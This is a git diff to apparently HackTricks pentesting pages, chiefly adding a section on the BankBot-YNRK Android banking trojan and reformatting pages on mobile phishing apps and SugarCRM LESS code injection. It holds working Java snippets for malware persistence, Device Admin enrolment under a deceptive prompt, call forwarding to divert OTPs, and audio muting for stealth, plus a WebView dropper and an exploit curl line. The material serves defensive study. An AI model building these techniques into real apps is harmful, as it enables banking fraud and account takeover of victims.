diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
index 7ca3e849fb4..3856fd5e0d9 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
@@ -63,6 +63,9 @@
 
 ## Useful Frida Snippet: Auto-Bypass Invitation Code
 
+<details>
+<summary>Frida hook to bypass invitation code</summary>
+
 ```python
 # frida -U -f com.badapp.android -l bypass.js --no-pause
 # Hook HttpURLConnection write to always return success
@@ -82,6 +85,8 @@ Java.perform(function() {
 });
 ```
 
+</details>
+
 ## Indicators (Generic)
 
 ```
@@ -145,7 +150,7 @@ Minimal loader:
 ```java
 WebView wv = findViewById(R.id.web);
 wv.getSettings().setJavaScriptEnabled(true);
-wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
+wv.loadUrl(upiPage); // ex: https://`<replit-app>`/gate.htm
 ```
 
 ### Self-propagation and SMS/OTP interception
@@ -228,9 +233,12 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann
 
 Typical client flow observed in the wild:
 
+<details>
+<summary>Socket.IO client flow assembling APK in the browser</summary>
+
 ```javascript
 // Open Socket.IO channel and request payload
-const socket = io("wss://<lure-domain>/ws", { transports: ["websocket"] });
+const socket = io("wss://`<lure-domain>`/ws", { transports: ["websocket"] });
 socket.emit("startDownload", { app: "com.example.app" });
 
 // Accumulate binary chunks and drive fake Play progress UI
@@ -248,6 +256,8 @@ socket.on("downloadComplete", () => {
 });
 ```
 
+</details>
+
 Why it evades simple controls:
 - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames.
 - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO.
@@ -265,6 +275,59 @@ See also WebSocket tradecraft and tooling:
 {{#endref}}
 
 
+## Accessibility-driven banker TTPs: JobScheduler + Device Admin + MMI call forwarding (BankBot‑YNRK)
+
+The Android/BankBot‑YNRK banker shows a compact stack for durable control and on‑device fraud via Accessibility. Key reusable traits:
+
+- Bootstrap & scope
+  - Target Android ≤ 13 where Accessibility can still auto‑drive permission flows; deep‑link Accessibility Settings and auto‑accept prompts. See:
+
+{{#ref}}
+../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
+{{#endref}}
+
+- Persistence via JobScheduler + Device Admin
+  - Schedule a persisted job (survives reboot) to regularly re‑kick background tasks:
+    ```java
+    ComponentName svc = new ComponentName(ctx, JobHandlerService.class);
+    JobInfo ji = new JobInfo.Builder(1337, svc)
+      .setRequiredNetworkType(JobInfo.NETWORK_TYPE_ANY)
+      .setPersisted(true)
+      .setMinimumLatency(30_000)
+      .setBackoffCriteria(30_000, JobInfo.BACKOFF_POLICY_LINEAR)
+      .build();
+    ctx.getSystemService(JobScheduler.class).schedule(ji);
+    ```
+  - Enrol as Device Admin to harden removal and regain control after reboot:
+    ```java
+    Intent i = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
+    i.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, new ComponentName(ctx, AdminReceiver.class));
+    i.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION, "Enable advanced protections");
+    ctx.startActivity(i);
+    ```
+
+- Silent OTP interception via call forwarding (MMI/USSD)
+  - Programmatically dial MMI to enable unconditional call forwarding, diverting voice OTPs to an attacker‑controlled number:
+    ```java
+    // Requires CALL_PHONE; behaviour varies by carrier/OEM
+    String mmi = "**21*" + number + "#";
+    Intent call = new Intent(Intent.ACTION_CALL, Uri.parse("tel:" + Uri.encode(mmi)));
+    ctx.startActivity(call);
+    ```
+
+- C2 & traffic
+  - Stage‑based HTTP tasking (e.g., on `:8181`) exchanging device/app context and target package lists; optional WebSocket/WebRTC (Janus on `:8989`) for interactive control.
+
+- Anti‑analysis & stealth
+  - Fingerprint vendor/ROM/emulator at init (`android.os.Build` fields, model→resolution maps) to gate execution.
+  - Suppress audible cues by muting multiple AudioManager streams when sensitive actions run:
+    ```java
+    AudioManager am = (AudioManager) ctx.getSystemService(Context.AUDIO_SERVICE);
+    int[] S = {AudioManager.STREAM_MUSIC, AudioManager.STREAM_RING, AudioManager.STREAM_NOTIFICATION};
+    for (int s: S) am.setStreamVolume(s, 0, 0);
+    ```
+
+
 ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study
 
 The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques.
@@ -274,6 +337,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript
 
 Minimal pattern:
 
+<details>
+<summary>WebView dropper that installs a second-stage payload from assets</summary>
+
 ```java
 public class DropperActivity extends Activity {
   @Override protected void onCreate(Bundle b){
@@ -303,6 +369,8 @@ public class DropperActivity extends Activity {
 }
 ```
 
+</details>
+
 HTML on the page:
 
 ```html
@@ -440,5 +508,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new
 - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/)
 - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN)
 - [Socket.IO](https://socket.io)
+- [Investigation Report: Android/BankBot‑YNRK Mobile Banking Trojan (CYFIRMA)](https://www.cyfirma.com/research/investigation-report-android-bankbot-ynrk-mobile-banking-trojan/)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
index b9d599deb30..6d338df2b68 100644
--- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md
+++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
@@ -1,4 +1,6 @@
-## LESS Code Injection leading to SSRF & Local File Read
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
 
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
 
 * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
 * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
\ No newline at end of file
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+{{#include ../../../banners/hacktricks-training.md}}